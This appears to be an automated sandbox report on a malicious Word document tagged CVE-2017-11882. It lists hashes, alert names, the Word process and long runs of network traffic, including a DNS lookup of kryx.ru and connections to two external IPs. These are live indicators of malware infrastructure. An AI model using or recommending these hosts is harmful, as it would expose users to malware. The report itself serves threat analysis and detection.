Edit tour

Windows Analysis Report
_________03M4138.docx.bin.doc

Overview

General Information

Sample name:	_________03M4138.docx.bin.doc
Analysis ID:	1638538
MD5:	5651f8c9b317bc1b3f23d406590255c1
SHA1:	f217e8fbb37c65867bbeecb2a6d6f0d556e91410
SHA256:	c4ca2614797569a0427242f6db7e5cc00be0d0edb358629a9350e31b5a7f4e49
Tags:	cve-2017-11882docdocxuser-TornadoAV_dev
Infos:

Detection

Score:	60
Range:	0 - 100
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Contains an external reference to another file

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Sigma detected: Suspicious Office Outbound Connections

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

WINWORD.EXE (PID: 6484 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)

cleanup

Sigma Signatures

Sigma detected: Suspicious Office Outbound Connections

Source: Network Connection

Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.7, DestinationIsIpv6: false, DestinationPort: 49683, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Initiated: true, ProcessId: 6484, Protocol: tcp, SourceIp: 188.225.72.170, SourceIsIpv6: false, SourcePort: 443

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-14T14:04:13.344283+0100	2028371	3	Unknown Traffic	192.168.2.7	49683	188.225.72.170	443	TCP
2025-03-14T14:04:15.725884+0100	2028371	3	Unknown Traffic	192.168.2.7	49685	188.225.72.170	443	TCP

Joe Security ANOMALY Microsoft Office WebDAV Discovery

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-14T14:04:14.919522+0100	1810005	1	Potentially Bad Traffic	192.168.2.7	49684	188.225.72.170	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: _________03M4138.docx.bin.doc

Virustotal: Detection: 9%

Perma Link

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 188.225.72.170:443 -> 192.168.2.7:49683 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.225.72.170:443 -> 192.168.2.7:49684 version: TLS 1.2

Source: global traffic

DNS query: name: kryx.ru

Source: global traffic	TCP traffic: 192.168.2.7:49687 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49683 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49683 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49683 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49683 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49683 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49683 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49683 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49683 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49685 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49685 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49685 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49685 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49685 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49685 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49685 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49685 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49687 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49687 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49687 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49687 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49687 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49687 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49687 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49687 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49687 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49692 -> 188.225.72.170:443

Source: global traffic	TCP traffic: 192.168.2.7:49683 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49683
Source: global traffic	TCP traffic: 192.168.2.7:49683 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49683 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49683
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49683
Source: global traffic	TCP traffic: 192.168.2.7:49683 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49683 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49683
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49683
Source: global traffic	TCP traffic: 192.168.2.7:49683 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49683
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49683
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49683
Source: global traffic	TCP traffic: 192.168.2.7:49683 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49683 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49683
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49684
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49684
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49684
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49684
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49684
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49684
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49684
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49684
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49684
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49684 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49685 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49685
Source: global traffic	TCP traffic: 192.168.2.7:49685 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49685 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49685
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49685
Source: global traffic	TCP traffic: 192.168.2.7:49685 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49685
Source: global traffic	TCP traffic: 192.168.2.7:49685 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49685
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49685
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49685
Source: global traffic	TCP traffic: 192.168.2.7:49685 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49685 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49685
Source: global traffic	TCP traffic: 192.168.2.7:49685 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49685
Source: global traffic	TCP traffic: 192.168.2.7:49686 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49686
Source: global traffic	TCP traffic: 192.168.2.7:49686 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49686 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49686
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49686
Source: global traffic	TCP traffic: 192.168.2.7:49686 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49687 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49687
Source: global traffic	TCP traffic: 192.168.2.7:49687 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49687 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49687
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49687
Source: global traffic	TCP traffic: 192.168.2.7:49687 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49687 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49687
Source: global traffic	TCP traffic: 192.168.2.7:49687 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49687
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49687
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49687
Source: global traffic	TCP traffic: 192.168.2.7:49687 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49687 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 192.168.2.7:49687 -> 188.225.72.170:443
Source: global traffic	TCP traffic: 188.225.72.170:443 -> 192.168.2.7:49687
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 213.165.70.90:80 -> 192.168.2.7:49689
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
Source: global traffic	TCP traffic: 192.168.2.7:49689 -> 213.165.70.90:80
